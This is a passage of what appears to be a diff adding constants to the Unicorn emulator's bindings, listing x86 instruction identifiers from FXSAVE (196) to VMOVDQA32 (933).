UC_X86_INS_FXSAVE = 196; + UC_X86_INS_FXSAVE64 = 197; + UC_X86_INS_FXTRACT = 198; + UC_X86_INS_FYL2X = 199; + UC_X86_INS_FYL2XP1 = 200; + UC_X86_INS_MOVAPD = 201; + UC_X86_INS_MOVAPS = 202; + UC_X86_INS_ORPD = 203; + UC_X86_INS_ORPS = 204; + UC_X86_INS_VMOVAPD = 205; + UC_X86_INS_VMOVAPS = 206; + UC_X86_INS_XORPD = 207; + UC_X86_INS_XORPS = 208; + UC_X86_INS_GETSEC = 209; + UC_X86_INS_HADDPD = 210; + UC_X86_INS_HADDPS = 211; + UC_X86_INS_HLT = 212; + UC_X86_INS_HSUBPD = 213; + UC_X86_INS_HSUBPS = 214; + UC_X86_INS_IDIV = 215; + UC_X86_INS_FILD = 216; + UC_X86_INS_IMUL = 217; + UC_X86_INS_IN = 218; + UC_X86_INS_INC = 219; + UC_X86_INS_INSB = 220; + UC_X86_INS_INSERTPS = 221; + UC_X86_INS_INSERTQ = 222; + UC_X86_INS_INSD = 223; + UC_X86_INS_INSW = 224; + UC_X86_INS_INT = 225; + UC_X86_INS_INT1 = 226; + UC_X86_INS_INT3 = 227; + UC_X86_INS_INTO = 228; + UC_X86_INS_INVD = 229; + UC_X86_INS_INVEPT = 230; + UC_X86_INS_INVLPG = 231; + UC_X86_INS_INVLPGA = 232; + UC_X86_INS_INVPCID = 233; + UC_X86_INS_INVVPID = 234; + UC_X86_INS_IRET = 235; + UC_X86_INS_IRETD = 236; + UC_X86_INS_IRETQ = 237; + UC_X86_INS_FISTTP = 238; + UC_X86_INS_FIST = 239; + UC_X86_INS_FISTP = 240; + UC_X86_INS_UCOMISD = 241; + UC_X86_INS_UCOMISS = 242; + UC_X86_INS_VCOMISD = 243; + UC_X86_INS_VCOMISS = 244; + UC_X86_INS_VCVTSD2SS = 245; + UC_X86_INS_VCVTSI2SD = 246; + UC_X86_INS_VCVTSI2SS = 247; + UC_X86_INS_VCVTSS2SD = 248; + UC_X86_INS_VCVTTSD2SI = 249; + UC_X86_INS_VCVTTSD2USI = 250; + UC_X86_INS_VCVTTSS2SI = 251; + UC_X86_INS_VCVTTSS2USI = 252; + UC_X86_INS_VCVTUSI2SD = 253; + UC_X86_INS_VCVTUSI2SS = 254; + UC_X86_INS_VUCOMISD = 255; + UC_X86_INS_VUCOMISS = 256; + UC_X86_INS_JAE = 257; + UC_X86_INS_JA = 258; + UC_X86_INS_JBE = 259; + UC_X86_INS_JB = 260; + UC_X86_INS_JCXZ = 261; + UC_X86_INS_JECXZ = 262; + UC_X86_INS_JE = 263; + UC_X86_INS_JGE = 264; + UC_X86_INS_JG = 265; + UC_X86_INS_JLE = 266; + UC_X86_INS_JL = 267; + UC_X86_INS_JMP = 268; + UC_X86_INS_JNE = 269; + UC_X86_INS_JNO = 270; + UC_X86_INS_JNP = 271; + UC_X86_INS_JNS = 272; + UC_X86_INS_JO = 273; + UC_X86_INS_JP = 274; + UC_X86_INS_JRCXZ = 275; + UC_X86_INS_JS = 276; + UC_X86_INS_KANDB = 277; + UC_X86_INS_KANDD = 278; + UC_X86_INS_KANDNB = 279; + UC_X86_INS_KANDND = 280; + UC_X86_INS_KANDNQ = 281; + UC_X86_INS_KANDNW = 282; + UC_X86_INS_KANDQ = 283; + UC_X86_INS_KANDW = 284; + UC_X86_INS_KMOVB = 285; + UC_X86_INS_KMOVD = 286; + UC_X86_INS_KMOVQ = 287; + UC_X86_INS_KMOVW = 288; + UC_X86_INS_KNOTB = 289; + UC_X86_INS_KNOTD = 290; + UC_X86_INS_KNOTQ = 291; + UC_X86_INS_KNOTW = 292; + UC_X86_INS_KORB = 293; + UC_X86_INS_KORD = 294; + UC_X86_INS_KORQ = 295; + UC_X86_INS_KORTESTB = 296; + UC_X86_INS_KORTESTD = 297; + UC_X86_INS_KORTESTQ = 298; + UC_X86_INS_KORTESTW = 299; + UC_X86_INS_KORW = 300; + UC_X86_INS_KSHIFTLB = 301; + UC_X86_INS_KSHIFTLD = 302; + UC_X86_INS_KSHIFTLQ = 303; + UC_X86_INS_KSHIFTLW = 304; + UC_X86_INS_KSHIFTRB = 305; + UC_X86_INS_KSHIFTRD = 306; + UC_X86_INS_KSHIFTRQ = 307; + UC_X86_INS_KSHIFTRW = 308; + UC_X86_INS_KUNPCKBW = 309; + UC_X86_INS_KXNORB = 310; + UC_X86_INS_KXNORD = 311; + UC_X86_INS_KXNORQ = 312; + UC_X86_INS_KXNORW = 313; + UC_X86_INS_KXORB = 314; + UC_X86_INS_KXORD = 315; + UC_X86_INS_KXORQ = 316; + UC_X86_INS_KXORW = 317; + UC_X86_INS_LAHF = 318; + UC_X86_INS_LAR = 319; + UC_X86_INS_LDDQU = 320; + UC_X86_INS_LDMXCSR = 321; + UC_X86_INS_LDS = 322; + UC_X86_INS_FLDZ = 323; + UC_X86_INS_FLD1 = 324; + UC_X86_INS_FLD = 325; + UC_X86_INS_LEA = 326; + UC_X86_INS_LEAVE = 327; + UC_X86_INS_LES = 328; + UC_X86_INS_LFENCE = 329; + UC_X86_INS_LFS = 330; + UC_X86_INS_LGDT = 331; + UC_X86_INS_LGS = 332; + UC_X86_INS_LIDT = 333; + UC_X86_INS_LLDT = 334; + UC_X86_INS_LMSW = 335; + UC_X86_INS_OR = 336; + UC_X86_INS_SUB = 337; + UC_X86_INS_XOR = 338; + UC_X86_INS_LODSB = 339; + UC_X86_INS_LODSD = 340; + UC_X86_INS_LODSQ = 341; + UC_X86_INS_LODSW = 342; + UC_X86_INS_LOOP = 343; + UC_X86_INS_LOOPE = 344; + UC_X86_INS_LOOPNE = 345; + UC_X86_INS_RETF = 346; + UC_X86_INS_RETFQ = 347; + UC_X86_INS_LSL = 348; + UC_X86_INS_LSS = 349; + UC_X86_INS_LTR = 350; + UC_X86_INS_XADD = 351; + UC_X86_INS_LZCNT = 352; + UC_X86_INS_MASKMOVDQU = 353; + UC_X86_INS_MAXPD = 354; + UC_X86_INS_MAXPS = 355; + UC_X86_INS_MAXSD = 356; + UC_X86_INS_MAXSS = 357; + UC_X86_INS_MFENCE = 358; + UC_X86_INS_MINPD = 359; + UC_X86_INS_MINPS = 360; + UC_X86_INS_MINSD = 361; + UC_X86_INS_MINSS = 362; + UC_X86_INS_CVTPD2PI = 363; + UC_X86_INS_CVTPI2PD = 364; + UC_X86_INS_CVTPI2PS = 365; + UC_X86_INS_CVTPS2PI = 366; + UC_X86_INS_CVTTPD2PI = 367; + UC_X86_INS_CVTTPS2PI = 368; + UC_X86_INS_EMMS = 369; + UC_X86_INS_MASKMOVQ = 370; + UC_X86_INS_MOVD = 371; + UC_X86_INS_MOVDQ2Q = 372; + UC_X86_INS_MOVNTQ = 373; + UC_X86_INS_MOVQ2DQ = 374; + UC_X86_INS_MOVQ = 375; + UC_X86_INS_PABSB = 376; + UC_X86_INS_PABSD = 377; + UC_X86_INS_PABSW = 378; + UC_X86_INS_PACKSSDW = 379; + UC_X86_INS_PACKSSWB = 380; + UC_X86_INS_PACKUSWB = 381; + UC_X86_INS_PADDB = 382; + UC_X86_INS_PADDD = 383; + UC_X86_INS_PADDQ = 384; + UC_X86_INS_PADDSB = 385; + UC_X86_INS_PADDSW = 386; + UC_X86_INS_PADDUSB = 387; + UC_X86_INS_PADDUSW = 388; + UC_X86_INS_PADDW = 389; + UC_X86_INS_PALIGNR = 390; + UC_X86_INS_PANDN = 391; + UC_X86_INS_PAND = 392; + UC_X86_INS_PAVGB = 393; + UC_X86_INS_PAVGW = 394; + UC_X86_INS_PCMPEQB = 395; + UC_X86_INS_PCMPEQD = 396; + UC_X86_INS_PCMPEQW = 397; + UC_X86_INS_PCMPGTB = 398; + UC_X86_INS_PCMPGTD = 399; + UC_X86_INS_PCMPGTW = 400; + UC_X86_INS_PEXTRW = 401; + UC_X86_INS_PHADDSW = 402; + UC_X86_INS_PHADDW = 403; + UC_X86_INS_PHADDD = 404; + UC_X86_INS_PHSUBD = 405; + UC_X86_INS_PHSUBSW = 406; + UC_X86_INS_PHSUBW = 407; + UC_X86_INS_PINSRW = 408; + UC_X86_INS_PMADDUBSW = 409; + UC_X86_INS_PMADDWD = 410; + UC_X86_INS_PMAXSW = 411; + UC_X86_INS_PMAXUB = 412; + UC_X86_INS_PMINSW = 413; + UC_X86_INS_PMINUB = 414; + UC_X86_INS_PMOVMSKB = 415; + UC_X86_INS_PMULHRSW = 416; + UC_X86_INS_PMULHUW = 417; + UC_X86_INS_PMULHW = 418; + UC_X86_INS_PMULLW = 419; + UC_X86_INS_PMULUDQ = 420; + UC_X86_INS_POR = 421; + UC_X86_INS_PSADBW = 422; + UC_X86_INS_PSHUFB = 423; + UC_X86_INS_PSHUFW = 424; + UC_X86_INS_PSIGNB = 425; + UC_X86_INS_PSIGND = 426; + UC_X86_INS_PSIGNW = 427; + UC_X86_INS_PSLLD = 428; + UC_X86_INS_PSLLQ = 429; + UC_X86_INS_PSLLW = 430; + UC_X86_INS_PSRAD = 431; + UC_X86_INS_PSRAW = 432; + UC_X86_INS_PSRLD = 433; + UC_X86_INS_PSRLQ = 434; + UC_X86_INS_PSRLW = 435; + UC_X86_INS_PSUBB = 436; + UC_X86_INS_PSUBD = 437; + UC_X86_INS_PSUBQ = 438; + UC_X86_INS_PSUBSB = 439; + UC_X86_INS_PSUBSW = 440; + UC_X86_INS_PSUBUSB = 441; + UC_X86_INS_PSUBUSW = 442; + UC_X86_INS_PSUBW = 443; + UC_X86_INS_PUNPCKHBW = 444; + UC_X86_INS_PUNPCKHDQ = 445; + UC_X86_INS_PUNPCKHWD = 446; + UC_X86_INS_PUNPCKLBW = 447; + UC_X86_INS_PUNPCKLDQ = 448; + UC_X86_INS_PUNPCKLWD = 449; + UC_X86_INS_PXOR = 450; + UC_X86_INS_MONITOR = 451; + UC_X86_INS_MONTMUL = 452; + UC_X86_INS_MOV = 453; + UC_X86_INS_MOVABS = 454; + UC_X86_INS_MOVBE = 455; + UC_X86_INS_MOVDDUP = 456; + UC_X86_INS_MOVDQA = 457; + UC_X86_INS_MOVDQU = 458; + UC_X86_INS_MOVHLPS = 459; + UC_X86_INS_MOVHPD = 460; + UC_X86_INS_MOVHPS = 461; + UC_X86_INS_MOVLHPS = 462; + UC_X86_INS_MOVLPD = 463; + UC_X86_INS_MOVLPS = 464; + UC_X86_INS_MOVMSKPD = 465; + UC_X86_INS_MOVMSKPS = 466; + UC_X86_INS_MOVNTDQA = 467; + UC_X86_INS_MOVNTDQ = 468; + UC_X86_INS_MOVNTI = 469; + UC_X86_INS_MOVNTPD = 470; + UC_X86_INS_MOVNTPS = 471; + UC_X86_INS_MOVNTSD = 472; + UC_X86_INS_MOVNTSS = 473; + UC_X86_INS_MOVSB = 474; + UC_X86_INS_MOVSD = 475; + UC_X86_INS_MOVSHDUP = 476; + UC_X86_INS_MOVSLDUP = 477; + UC_X86_INS_MOVSQ = 478; + UC_X86_INS_MOVSS = 479; + UC_X86_INS_MOVSW = 480; + UC_X86_INS_MOVSX = 481; + UC_X86_INS_MOVSXD = 482; + UC_X86_INS_MOVUPD = 483; + UC_X86_INS_MOVUPS = 484; + UC_X86_INS_MOVZX = 485; + UC_X86_INS_MPSADBW = 486; + UC_X86_INS_MUL = 487; + UC_X86_INS_MULPD = 488; + UC_X86_INS_MULPS = 489; + UC_X86_INS_MULSD = 490; + UC_X86_INS_MULSS = 491; + UC_X86_INS_MULX = 492; + UC_X86_INS_FMUL = 493; + UC_X86_INS_FIMUL = 494; + UC_X86_INS_FMULP = 495; + UC_X86_INS_MWAIT = 496; + UC_X86_INS_NEG = 497; + UC_X86_INS_NOP = 498; + UC_X86_INS_NOT = 499; + UC_X86_INS_OUT = 500; + UC_X86_INS_OUTSB = 501; + UC_X86_INS_OUTSD = 502; + UC_X86_INS_OUTSW = 503; + UC_X86_INS_PACKUSDW = 504; + UC_X86_INS_PAUSE = 505; + UC_X86_INS_PAVGUSB = 506; + UC_X86_INS_PBLENDVB = 507; + UC_X86_INS_PBLENDW = 508; + UC_X86_INS_PCLMULQDQ = 509; + UC_X86_INS_PCMPEQQ = 510; + UC_X86_INS_PCMPESTRI = 511; + UC_X86_INS_PCMPESTRM = 512; + UC_X86_INS_PCMPGTQ = 513; + UC_X86_INS_PCMPISTRI = 514; + UC_X86_INS_PCMPISTRM = 515; + UC_X86_INS_PCOMMIT = 516; + UC_X86_INS_PDEP = 517; + UC_X86_INS_PEXT = 518; + UC_X86_INS_PEXTRB = 519; + UC_X86_INS_PEXTRD = 520; + UC_X86_INS_PEXTRQ = 521; + UC_X86_INS_PF2ID = 522; + UC_X86_INS_PF2IW = 523; + UC_X86_INS_PFACC = 524; + UC_X86_INS_PFADD = 525; + UC_X86_INS_PFCMPEQ = 526; + UC_X86_INS_PFCMPGE = 527; + UC_X86_INS_PFCMPGT = 528; + UC_X86_INS_PFMAX = 529; + UC_X86_INS_PFMIN = 530; + UC_X86_INS_PFMUL = 531; + UC_X86_INS_PFNACC = 532; + UC_X86_INS_PFPNACC = 533; + UC_X86_INS_PFRCPIT1 = 534; + UC_X86_INS_PFRCPIT2 = 535; + UC_X86_INS_PFRCP = 536; + UC_X86_INS_PFRSQIT1 = 537; + UC_X86_INS_PFRSQRT = 538; + UC_X86_INS_PFSUBR = 539; + UC_X86_INS_PFSUB = 540; + UC_X86_INS_PHMINPOSUW = 541; + UC_X86_INS_PI2FD = 542; + UC_X86_INS_PI2FW = 543; + UC_X86_INS_PINSRB = 544; + UC_X86_INS_PINSRD = 545; + UC_X86_INS_PINSRQ = 546; + UC_X86_INS_PMAXSB = 547; + UC_X86_INS_PMAXSD = 548; + UC_X86_INS_PMAXUD = 549; + UC_X86_INS_PMAXUW = 550; + UC_X86_INS_PMINSB = 551; + UC_X86_INS_PMINSD = 552; + UC_X86_INS_PMINUD = 553; + UC_X86_INS_PMINUW = 554; + UC_X86_INS_PMOVSXBD = 555; + UC_X86_INS_PMOVSXBQ = 556; + UC_X86_INS_PMOVSXBW = 557; + UC_X86_INS_PMOVSXDQ = 558; + UC_X86_INS_PMOVSXWD = 559; + UC_X86_INS_PMOVSXWQ = 560; + UC_X86_INS_PMOVZXBD = 561; + UC_X86_INS_PMOVZXBQ = 562; + UC_X86_INS_PMOVZXBW = 563; + UC_X86_INS_PMOVZXDQ = 564; + UC_X86_INS_PMOVZXWD = 565; + UC_X86_INS_PMOVZXWQ = 566; + UC_X86_INS_PMULDQ = 567; + UC_X86_INS_PMULHRW = 568; + UC_X86_INS_PMULLD = 569; + UC_X86_INS_POP = 570; + UC_X86_INS_POPAW = 571; + UC_X86_INS_POPAL = 572; + UC_X86_INS_POPCNT = 573; + UC_X86_INS_POPF = 574; + UC_X86_INS_POPFD = 575; + UC_X86_INS_POPFQ = 576; + UC_X86_INS_PREFETCH = 577; + UC_X86_INS_PREFETCHNTA = 578; + UC_X86_INS_PREFETCHT0 = 579; + UC_X86_INS_PREFETCHT1 = 580; + UC_X86_INS_PREFETCHT2 = 581; + UC_X86_INS_PREFETCHW = 582; + UC_X86_INS_PSHUFD = 583; + UC_X86_INS_PSHUFHW = 584; + UC_X86_INS_PSHUFLW = 585; + UC_X86_INS_PSLLDQ = 586; + UC_X86_INS_PSRLDQ = 587; + UC_X86_INS_PSWAPD = 588; + UC_X86_INS_PTEST = 589; + UC_X86_INS_PUNPCKHQDQ = 590; + UC_X86_INS_PUNPCKLQDQ = 591; + UC_X86_INS_PUSH = 592; + UC_X86_INS_PUSHAW = 593; + UC_X86_INS_PUSHAL = 594; + UC_X86_INS_PUSHF = 595; + UC_X86_INS_PUSHFD = 596; + UC_X86_INS_PUSHFQ = 597; + UC_X86_INS_RCL = 598; + UC_X86_INS_RCPPS = 599; + UC_X86_INS_RCPSS = 600; + UC_X86_INS_RCR = 601; + UC_X86_INS_RDFSBASE = 602; + UC_X86_INS_RDGSBASE = 603; + UC_X86_INS_RDMSR = 604; + UC_X86_INS_RDPMC = 605; + UC_X86_INS_RDRAND = 606; + UC_X86_INS_RDSEED = 607; + UC_X86_INS_RDTSC = 608; + UC_X86_INS_RDTSCP = 609; + UC_X86_INS_ROL = 610; + UC_X86_INS_ROR = 611; + UC_X86_INS_RORX = 612; + UC_X86_INS_ROUNDPD = 613; + UC_X86_INS_ROUNDPS = 614; + UC_X86_INS_ROUNDSD = 615; + UC_X86_INS_ROUNDSS = 616; + UC_X86_INS_RSM = 617; + UC_X86_INS_RSQRTPS = 618; + UC_X86_INS_RSQRTSS = 619; + UC_X86_INS_SAHF = 620; + UC_X86_INS_SAL = 621; + UC_X86_INS_SALC = 622; + UC_X86_INS_SAR = 623; + UC_X86_INS_SARX = 624; + UC_X86_INS_SBB = 625; + UC_X86_INS_SCASB = 626; + UC_X86_INS_SCASD = 627; + UC_X86_INS_SCASQ = 628; + UC_X86_INS_SCASW = 629; + UC_X86_INS_SETAE = 630; + UC_X86_INS_SETA = 631; + UC_X86_INS_SETBE = 632; + UC_X86_INS_SETB = 633; + UC_X86_INS_SETE = 634; + UC_X86_INS_SETGE = 635; + UC_X86_INS_SETG = 636; + UC_X86_INS_SETLE = 637; + UC_X86_INS_SETL = 638; + UC_X86_INS_SETNE = 639; + UC_X86_INS_SETNO = 640; + UC_X86_INS_SETNP = 641; + UC_X86_INS_SETNS = 642; + UC_X86_INS_SETO = 643; + UC_X86_INS_SETP = 644; + UC_X86_INS_SETS = 645; + UC_X86_INS_SFENCE = 646; + UC_X86_INS_SGDT = 647; + UC_X86_INS_SHA1MSG1 = 648; + UC_X86_INS_SHA1MSG2 = 649; + UC_X86_INS_SHA1NEXTE = 650; + UC_X86_INS_SHA1RNDS4 = 651; + UC_X86_INS_SHA256MSG1 = 652; + UC_X86_INS_SHA256MSG2 = 653; + UC_X86_INS_SHA256RNDS2 = 654; + UC_X86_INS_SHL = 655; + UC_X86_INS_SHLD = 656; + UC_X86_INS_SHLX = 657; + UC_X86_INS_SHR = 658; + UC_X86_INS_SHRD = 659; + UC_X86_INS_SHRX = 660; + UC_X86_INS_SHUFPD = 661; + UC_X86_INS_SHUFPS = 662; + UC_X86_INS_SIDT = 663; + UC_X86_INS_FSIN = 664; + UC_X86_INS_SKINIT = 665; + UC_X86_INS_SLDT = 666; + UC_X86_INS_SMSW = 667; + UC_X86_INS_SQRTPD = 668; + UC_X86_INS_SQRTPS = 669; + UC_X86_INS_SQRTSD = 670; + UC_X86_INS_SQRTSS = 671; + UC_X86_INS_FSQRT = 672; + UC_X86_INS_STAC = 673; + UC_X86_INS_STC = 674; + UC_X86_INS_STD = 675; + UC_X86_INS_STGI = 676; + UC_X86_INS_STI = 677; + UC_X86_INS_STMXCSR = 678; + UC_X86_INS_STOSB = 679; + UC_X86_INS_STOSD = 680; + UC_X86_INS_STOSQ = 681; + UC_X86_INS_STOSW = 682; + UC_X86_INS_STR = 683; + UC_X86_INS_FST = 684; + UC_X86_INS_FSTP = 685; + UC_X86_INS_FSTPNCE = 686; + UC_X86_INS_FXCH = 687; + UC_X86_INS_SUBPD = 688; + UC_X86_INS_SUBPS = 689; + UC_X86_INS_FSUBR = 690; + UC_X86_INS_FISUBR = 691; + UC_X86_INS_FSUBRP = 692; + UC_X86_INS_SUBSD = 693; + UC_X86_INS_SUBSS = 694; + UC_X86_INS_FSUB = 695; + UC_X86_INS_FISUB = 696; + UC_X86_INS_FSUBP = 697; + UC_X86_INS_SWAPGS = 698; + UC_X86_INS_SYSCALL = 699; + UC_X86_INS_SYSENTER = 700; + UC_X86_INS_SYSEXIT = 701; + UC_X86_INS_SYSRET = 702; + UC_X86_INS_T1MSKC = 703; + UC_X86_INS_TEST = 704; + UC_X86_INS_UD2 = 705; + UC_X86_INS_FTST = 706; + UC_X86_INS_TZCNT = 707; + UC_X86_INS_TZMSK = 708; + UC_X86_INS_FUCOMPI = 709; + UC_X86_INS_FUCOMI = 710; + UC_X86_INS_FUCOMPP = 711; + UC_X86_INS_FUCOMP = 712; + UC_X86_INS_FUCOM = 713; + UC_X86_INS_UD2B = 714; + UC_X86_INS_UNPCKHPD = 715; + UC_X86_INS_UNPCKHPS = 716; + UC_X86_INS_UNPCKLPD = 717; + UC_X86_INS_UNPCKLPS = 718; + UC_X86_INS_VADDPD = 719; + UC_X86_INS_VADDPS = 720; + UC_X86_INS_VADDSD = 721; + UC_X86_INS_VADDSS = 722; + UC_X86_INS_VADDSUBPD = 723; + UC_X86_INS_VADDSUBPS = 724; + UC_X86_INS_VAESDECLAST = 725; + UC_X86_INS_VAESDEC = 726; + UC_X86_INS_VAESENCLAST = 727; + UC_X86_INS_VAESENC = 728; + UC_X86_INS_VAESIMC = 729; + UC_X86_INS_VAESKEYGENASSIST = 730; + UC_X86_INS_VALIGND = 731; + UC_X86_INS_VALIGNQ = 732; + UC_X86_INS_VANDNPD = 733; + UC_X86_INS_VANDNPS = 734; + UC_X86_INS_VANDPD = 735; + UC_X86_INS_VANDPS = 736; + UC_X86_INS_VBLENDMPD = 737; + UC_X86_INS_VBLENDMPS = 738; + UC_X86_INS_VBLENDPD = 739; + UC_X86_INS_VBLENDPS = 740; + UC_X86_INS_VBLENDVPD = 741; + UC_X86_INS_VBLENDVPS = 742; + UC_X86_INS_VBROADCASTF128 = 743; + UC_X86_INS_VBROADCASTI32X4 = 744; + UC_X86_INS_VBROADCASTI64X4 = 745; + UC_X86_INS_VBROADCASTSD = 746; + UC_X86_INS_VBROADCASTSS = 747; + UC_X86_INS_VCMPPD = 748; + UC_X86_INS_VCMPPS = 749; + UC_X86_INS_VCMPSD = 750; + UC_X86_INS_VCMPSS = 751; + UC_X86_INS_VCOMPRESSPD = 752; + UC_X86_INS_VCOMPRESSPS = 753; + UC_X86_INS_VCVTDQ2PD = 754; + UC_X86_INS_VCVTDQ2PS = 755; + UC_X86_INS_VCVTPD2DQX = 756; + UC_X86_INS_VCVTPD2DQ = 757; + UC_X86_INS_VCVTPD2PSX = 758; + UC_X86_INS_VCVTPD2PS = 759; + UC_X86_INS_VCVTPD2UDQ = 760; + UC_X86_INS_VCVTPH2PS = 761; + UC_X86_INS_VCVTPS2DQ = 762; + UC_X86_INS_VCVTPS2PD = 763; + UC_X86_INS_VCVTPS2PH = 764; + UC_X86_INS_VCVTPS2UDQ = 765; + UC_X86_INS_VCVTSD2SI = 766; + UC_X86_INS_VCVTSD2USI = 767; + UC_X86_INS_VCVTSS2SI = 768; + UC_X86_INS_VCVTSS2USI = 769; + UC_X86_INS_VCVTTPD2DQX = 770; + UC_X86_INS_VCVTTPD2DQ = 771; + UC_X86_INS_VCVTTPD2UDQ = 772; + UC_X86_INS_VCVTTPS2DQ = 773; + UC_X86_INS_VCVTTPS2UDQ = 774; + UC_X86_INS_VCVTUDQ2PD = 775; + UC_X86_INS_VCVTUDQ2PS = 776; + UC_X86_INS_VDIVPD = 777; + UC_X86_INS_VDIVPS = 778; + UC_X86_INS_VDIVSD = 779; + UC_X86_INS_VDIVSS = 780; + UC_X86_INS_VDPPD = 781; + UC_X86_INS_VDPPS = 782; + UC_X86_INS_VERR = 783; + UC_X86_INS_VERW = 784; + UC_X86_INS_VEXP2PD = 785; + UC_X86_INS_VEXP2PS = 786; + UC_X86_INS_VEXPANDPD = 787; + UC_X86_INS_VEXPANDPS = 788; + UC_X86_INS_VEXTRACTF128 = 789; + UC_X86_INS_VEXTRACTF32X4 = 790; + UC_X86_INS_VEXTRACTF64X4 = 791; + UC_X86_INS_VEXTRACTI128 = 792; + UC_X86_INS_VEXTRACTI32X4 = 793; + UC_X86_INS_VEXTRACTI64X4 = 794; + UC_X86_INS_VEXTRACTPS = 795; + UC_X86_INS_VFMADD132PD = 796; + UC_X86_INS_VFMADD132PS = 797; + UC_X86_INS_VFMADDPD = 798; + UC_X86_INS_VFMADD213PD = 799; + UC_X86_INS_VFMADD231PD = 800; + UC_X86_INS_VFMADDPS = 801; + UC_X86_INS_VFMADD213PS = 802; + UC_X86_INS_VFMADD231PS = 803; + UC_X86_INS_VFMADDSD = 804; + UC_X86_INS_VFMADD213SD = 805; + UC_X86_INS_VFMADD132SD = 806; + UC_X86_INS_VFMADD231SD = 807; + UC_X86_INS_VFMADDSS = 808; + UC_X86_INS_VFMADD213SS = 809; + UC_X86_INS_VFMADD132SS = 810; + UC_X86_INS_VFMADD231SS = 811; + UC_X86_INS_VFMADDSUB132PD = 812; + UC_X86_INS_VFMADDSUB132PS = 813; + UC_X86_INS_VFMADDSUBPD = 814; + UC_X86_INS_VFMADDSUB213PD = 815; + UC_X86_INS_VFMADDSUB231PD = 816; + UC_X86_INS_VFMADDSUBPS = 817; + UC_X86_INS_VFMADDSUB213PS = 818; + UC_X86_INS_VFMADDSUB231PS = 819; + UC_X86_INS_VFMSUB132PD = 820; + UC_X86_INS_VFMSUB132PS = 821; + UC_X86_INS_VFMSUBADD132PD = 822; + UC_X86_INS_VFMSUBADD132PS = 823; + UC_X86_INS_VFMSUBADDPD = 824; + UC_X86_INS_VFMSUBADD213PD = 825; + UC_X86_INS_VFMSUBADD231PD = 826; + UC_X86_INS_VFMSUBADDPS = 827; + UC_X86_INS_VFMSUBADD213PS = 828; + UC_X86_INS_VFMSUBADD231PS = 829; + UC_X86_INS_VFMSUBPD = 830; + UC_X86_INS_VFMSUB213PD = 831; + UC_X86_INS_VFMSUB231PD = 832; + UC_X86_INS_VFMSUBPS = 833; + UC_X86_INS_VFMSUB213PS = 834; + UC_X86_INS_VFMSUB231PS = 835; + UC_X86_INS_VFMSUBSD = 836; + UC_X86_INS_VFMSUB213SD = 837; + UC_X86_INS_VFMSUB132SD = 838; + UC_X86_INS_VFMSUB231SD = 839; + UC_X86_INS_VFMSUBSS = 840; + UC_X86_INS_VFMSUB213SS = 841; + UC_X86_INS_VFMSUB132SS = 842; + UC_X86_INS_VFMSUB231SS = 843; + UC_X86_INS_VFNMADD132PD = 844; + UC_X86_INS_VFNMADD132PS = 845; + UC_X86_INS_VFNMADDPD = 846; + UC_X86_INS_VFNMADD213PD = 847; + UC_X86_INS_VFNMADD231PD = 848; + UC_X86_INS_VFNMADDPS = 849; + UC_X86_INS_VFNMADD213PS = 850; + UC_X86_INS_VFNMADD231PS = 851; + UC_X86_INS_VFNMADDSD = 852; + UC_X86_INS_VFNMADD213SD = 853; + UC_X86_INS_VFNMADD132SD = 854; + UC_X86_INS_VFNMADD231SD = 855; + UC_X86_INS_VFNMADDSS = 856; + UC_X86_INS_VFNMADD213SS = 857; + UC_X86_INS_VFNMADD132SS = 858; + UC_X86_INS_VFNMADD231SS = 859; + UC_X86_INS_VFNMSUB132PD = 860; + UC_X86_INS_VFNMSUB132PS = 861; + UC_X86_INS_VFNMSUBPD = 862; + UC_X86_INS_VFNMSUB213PD = 863; + UC_X86_INS_VFNMSUB231PD = 864; + UC_X86_INS_VFNMSUBPS = 865; + UC_X86_INS_VFNMSUB213PS = 866; + UC_X86_INS_VFNMSUB231PS = 867; + UC_X86_INS_VFNMSUBSD = 868; + UC_X86_INS_VFNMSUB213SD = 869; + UC_X86_INS_VFNMSUB132SD = 870; + UC_X86_INS_VFNMSUB231SD = 871; + UC_X86_INS_VFNMSUBSS = 872; + UC_X86_INS_VFNMSUB213SS = 873; + UC_X86_INS_VFNMSUB132SS = 874; + UC_X86_INS_VFNMSUB231SS = 875; + UC_X86_INS_VFRCZPD = 876; + UC_X86_INS_VFRCZPS = 877; + UC_X86_INS_VFRCZSD = 878; + UC_X86_INS_VFRCZSS = 879; + UC_X86_INS_VORPD = 880; + UC_X86_INS_VORPS = 881; + UC_X86_INS_VXORPD = 882; + UC_X86_INS_VXORPS = 883; + UC_X86_INS_VGATHERDPD = 884; + UC_X86_INS_VGATHERDPS = 885; + UC_X86_INS_VGATHERPF0DPD = 886; + UC_X86_INS_VGATHERPF0DPS = 887; + UC_X86_INS_VGATHERPF0QPD = 888; + UC_X86_INS_VGATHERPF0QPS = 889; + UC_X86_INS_VGATHERPF1DPD = 890; + UC_X86_INS_VGATHERPF1DPS = 891; + UC_X86_INS_VGATHERPF1QPD = 892; + UC_X86_INS_VGATHERPF1QPS = 893; + UC_X86_INS_VGATHERQPD = 894; + UC_X86_INS_VGATHERQPS = 895; + UC_X86_INS_VHADDPD = 896; + UC_X86_INS_VHADDPS = 897; + UC_X86_INS_VHSUBPD = 898; + UC_X86_INS_VHSUBPS = 899; + UC_X86_INS_VINSERTF128 = 900; + UC_X86_INS_VINSERTF32X4 = 901; + UC_X86_INS_VINSERTF32X8 = 902; + UC_X86_INS_VINSERTF64X2 = 903; + UC_X86_INS_VINSERTF64X4 = 904; + UC_X86_INS_VINSERTI128 = 905; + UC_X86_INS_VINSERTI32X4 = 906; + UC_X86_INS_VINSERTI32X8 = 907; + UC_X86_INS_VINSERTI64X2 = 908; + UC_X86_INS_VINSERTI64X4 = 909; + UC_X86_INS_VINSERTPS = 910; + UC_X86_INS_VLDDQU = 911; + UC_X86_INS_VLDMXCSR = 912; + UC_X86_INS_VMASKMOVDQU = 913; + UC_X86_INS_VMASKMOVPD = 914; + UC_X86_INS_VMASKMOVPS = 915; + UC_X86_INS_VMAXPD = 916; + UC_X86_INS_VMAXPS = 917; + UC_X86_INS_VMAXSD = 918; + UC_X86_INS_VMAXSS = 919; + UC_X86_INS_VMCALL = 920; + UC_X86_INS_VMCLEAR = 921; + UC_X86_INS_VMFUNC = 922; + UC_X86_INS_VMINPD = 923; + UC_X86_INS_VMINPS = 924; + UC_X86_INS_VMINSD = 925; + UC_X86_INS_VMINSS = 926; + UC_X86_INS_VMLAUNCH = 927; + UC_X86_INS_VMLOAD = 928; + UC_X86_INS_VMMCALL = 929; + UC_X86_INS_VMOVQ = 930; + UC_X86_INS_VMOVDDUP = 931; + UC_X86_INS_VMOVD = 932; + UC_X86_INS_VMOVDQA32 = 933; + 